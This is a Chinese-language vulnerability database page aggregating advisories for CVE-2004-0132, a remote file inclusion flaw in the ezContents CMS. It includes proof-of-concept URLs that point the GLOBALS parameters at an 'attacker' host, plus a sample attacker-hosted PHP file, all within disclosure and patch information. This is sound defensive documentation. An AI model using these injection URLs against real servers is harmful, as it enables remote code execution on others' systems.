CVE-2004-0132
CVSS7.5
发布时间 :2004-03-03 00:00:00
修订时间 :2016-10-17 22:41:05
NMCOEPS    

[原文]Multiple PHP remote file inclusion vulnerabilities in ezContents 2.0.2 and earlier allow remote attackers to execute arbitrary PHP code from a remote web server, as demonstrated using (1) the GLOBALS[rootdp] parameter to db.php, or (2) the GLOBALS[language_home] parameter to archivednews.php, and a malicious version of lang_admin.php.


[CNNVD]VisualShapers ezContents多个模块文件包含漏洞(CNNVD-200403-018)

        
        ezContents是一款开放源代码内容管理系统。
        ezContents包含的多个模块对用户提交输入缺少充分过滤,远程攻击者可以利用这些漏洞进行SQL注入攻击,修改数据库及获得敏感数据。
        问题是包含的'db.php'及'archivednews.php'脚本对用户提交的'GLOBALS[rootdp]'和'GLOBALS[language_home]'变量数据缺少充分过滤,提交指定远程服务器上的文件作为变量数据,可能以WEB进程权限执行任意代码。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:visualshapers:ezcontents:2.0_rc2
cpe:/a:visualshapers:ezcontents:2.0_rc3
cpe:/a:visualshapers:ezcontents:2.0.1
cpe:/a:visualshapers:ezcontents:1.44
cpe:/a:visualshapers:ezcontents:1.45
cpe:/a:visualshapers:ezcontents:1.45b
cpe:/a:visualshapers:ezcontents:1.40
cpe:/a:visualshapers:ezcontents:1.43
cpe:/a:visualshapers:ezcontents:1.41
cpe:/a:visualshapers:ezcontents:2.0_rc1
cpe:/a:visualshapers:ezcontents:2.0.2
cpe:/a:visualshapers:ezcontents:1.42

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0132
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0132
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200403-018
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=107651585921958&w=2
(UNKNOWN)  BUGTRAQ  20040210 PHP Code Injection Vulnerabilities in ezContents 2.0.2 and prior
http://xforce.iss.net/xforce/xfdb/15135
(VENDOR_ADVISORY)  XF  ezcontents-multiple-file-include(15135)

- 漏洞信息

VisualShapers ezContents多个模块文件包含漏洞
高危 输入验证
2004-03-03 00:00:00 2006-09-28 00:00:00
远程  
        
        ezContents是一款开放源代码内容管理系统。
        ezContents包含的多个模块对用户提交输入缺少充分过滤,远程攻击者可以利用这些漏洞进行SQL注入攻击,修改数据库及获得敏感数据。
        问题是包含的'db.php'及'archivednews.php'脚本对用户提交的'GLOBALS[rootdp]'和'GLOBALS[language_home]'变量数据缺少充分过滤,提交指定远程服务器上的文件作为变量数据,可能以WEB进程权限执行任意代码。
        

- 公告与补丁

        厂商补丁:
        VisualShapers
        -------------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        VisualShapers Upgrade ezContents203.tar.gz
        
        http://www.ezcontentsdev.org/ezContents203.tar.gz

- 漏洞信息 (23683)

VisualShapers ezContents 1.x/2.0 db.php Arbitrary File Inclusion (EDBID:23683)
php webapps
2004-02-11 Verified
0 Cedric Cochin
N/A [点击下载]
source: http://www.securityfocus.com/bid/9638/info

It has been reported that ezContents may be prone to a file include vulnerability in multiple modules. The problem reportedly exists because remote users may influence the 'GLOBALS[rootdp]' and 'GLOBALS[language_home]' variables in the 'db.php' and 'archivednews.php' modules. 

This vulnerability is reported to affect ezContents 2.0.2 and prior running on PHP 4.3.0 or above.

http://www.example.com/[ezContents_directory]/include/db.php?GLOBALS[rootdp]=http://www.example.com/		

- 漏洞信息 (23684)

VisualShapers ezContents 1.x/2.0 archivednews.php Arbitrary File Inclusion (EDBID:23684)
php webapps
2004-02-11 Verified
0 Cedric Cochin
N/A [点击下载]
source: http://www.securityfocus.com/bid/9638/info
 
It has been reported that ezContents may be prone to a file include vulnerability in multiple modules. The problem reportedly exists because remote users may influence the 'GLOBALS[rootdp]' and 'GLOBALS[language_home]' variables in the 'db.php' and 'archivednews.php' modules.
 
This vulnerability is reported to affect ezContents 2.0.2 and prior running on PHP 4.3.0 or above.

http://www.example.com/[ezContents_directory]/modules/news/archivednews.php?GLOBALS[language_home]=http://www.example.com/&GLOBALS[gsLanguage]=ezContents		

- 漏洞信息 (F32668)

ezContents.txt (PacketStormID:F32668)
2004-02-11 00:00:00
Cedric Cochin  
advisory,remote,arbitrary,php,vulnerability
CVE-2004-0132
[点击下载]

PHP code injection vulnerabilities in ezContents versions 2.0.2 and prior allow for a remote attacker to access arbitrary files and execute commands on the server.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


	PHP Code Injection Vulnerabilities in ezContents 2.0.2 and prior

################################################################################
Summary :

ezContents a free open source content management system has been found to be
vulnerable to Multiple PHP Code Injection vulnerabilities.  They enable a
malicious user to access arbitrary files or execute commands on the server.

################################################################################
Details :

Multiple PHP scripts can be exploited to perform PHP Code Injection.

Vulnerable Systems:
* ezContents 2.0.2 and prior

CVE :
CAN-2004-0132

Release Date :
February 11, 2004

Severity :
HIGH

################################################################################
Examples :

		  -------------------------------------------
			 
http://[target]/[ezContents_directory]/include/db.php?GLOBALS[rootdp]=http://attacker/

Will import the following file into the PHP code.
- --> http://attacker/include/adodb/adodb.inc.php

Attacker just has to create the file adodb.inc.php as :
<? print "<?phpinfo();exit?>"?>

Idem with 

http://[target]/[ezContents_directory]/modules/news/archivednews.php?GLOBALS[language_home]=http://attacker/&GLOBALS[gsLanguage]=ezContents

Will import the following file into the PHP code.
- --> http://attacker/ezContents/lang_admin.php

This vulnerability only applies when running ezContents on PHP version 4.3.0 or
above (prior versions did not support the inclusion of remote files); "URL
fopen wrappers" are enabled (the default); and with 'register_globals' set to
"On".

This vulnerability is present in a decent number of PHP files. The behavior of
version 2.0RC3 and 2.0.1 is approximatively the same. Some of the attack are
not working on the both due to different include() calls. (for example the
second one is not working on 2.0RC3 due to an additional "languages/" at the
beginning of the include call).

################################################################################
Vendor Status :

The information has been provided to ezContents Support Team.
A new release with fixes for these vulnerabilities is already available.
- --> http://www.ezcontents.org/forum/viewtopic.php?t=361

################################################################################
Credit :

Cedric Cochin, Security Engineer, netVigilance, inc.
< cco at netvigilance dot com >

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQFAKWcjA9/8vqmWoYQRAkq6AJ9q00rfnDgZhxM+nc7CwkTserUSPQCglQ14
YpfZJvi3ulhpgu/r9dnEpF0=
=g3Xn
-----END PGP SIGNATURE-----
    

- 漏洞信息

3912
ezContents db.php Arbitrary File Inclusion
Remote / Network Access Authentication Management, Input Manipulation
Loss of Integrity, Loss of Availability
Exploit Public

- 漏洞描述

ezContent contains a flaw that may allow a malicious user to execute arbitrary code. The issue is triggered when an attacker sends a specially crafted URL to the server. It is possible that the flaw may allow arbitrary code execution resulting in a loss of confidentiality, integrity, and/or availability.

- 时间线

2004-02-11 2004-02-11
Unknow Unknow

- 解决方案

Upgrade to version 2.0.3 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

VisualShapers ezContents Multiple Module File Include Vulnerability
Input Validation Error 9638
Yes No
2004-02-11 12:00:00 2009-07-12 02:06:00
The disclosure of this issue has been credited to Cedric Cochin <cco@netvigilance.com>.

- 受影响的程序版本

VisualShapers ezContents 2.0.2
VisualShapers ezContents 2.0.1
VisualShapers ezContents 2.0 rc3
VisualShapers ezContents 2.0 rc2
VisualShapers ezContents 2.0 rc1
VisualShapers ezContents 1.45 b
VisualShapers ezContents 1.44
VisualShapers ezContents 1.43
VisualShapers ezContents 1.42
VisualShapers ezContents 1.41
VisualShapers ezContents 1.40
VisualShapers ezContents 1.4.5
VisualShapers ezContents 2.0.3

- 不受影响的程序版本

VisualShapers ezContents 2.0.3

- 漏洞讨论

It has been reported that ezContents may be prone to a file include vulnerability in multiple modules. The problem reportedly exists because remote users may influence the 'GLOBALS[rootdp]' and 'GLOBALS[language_home]' variables in the 'db.php' and 'archivednews.php' modules.

This vulnerability is reported to affect ezContents 2.0.2 and prior running on PHP 4.3.0 or above.

- 漏洞利用

No exploit is required.

The following proof of concept has been provided:
http://www.example.com/[ezContents_directory]/include/db.php?GLOBALS[rootdp]=http://www.example.com/
http://www.example.com/[ezContents_directory]/modules/news/archivednews.php?GLOBALS[language_home]=http://www.example.com/&amp;GLOBALS[gsLanguage]=ezContents

- 解决方案

The vendor has released ezContents 2.0.3 to address this issue. Users are advised to upgrade to the fixed version.


VisualShapers ezContents 1.4.5

VisualShapers ezContents 1.40

VisualShapers ezContents 1.41

VisualShapers ezContents 1.42

VisualShapers ezContents 1.43

VisualShapers ezContents 1.44

VisualShapers ezContents 1.45 b

VisualShapers ezContents 2.0 rc2

VisualShapers ezContents 2.0 rc3

VisualShapers ezContents 2.0 rc1

VisualShapers ezContents 2.0.1

VisualShapers ezContents 2.0.2

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站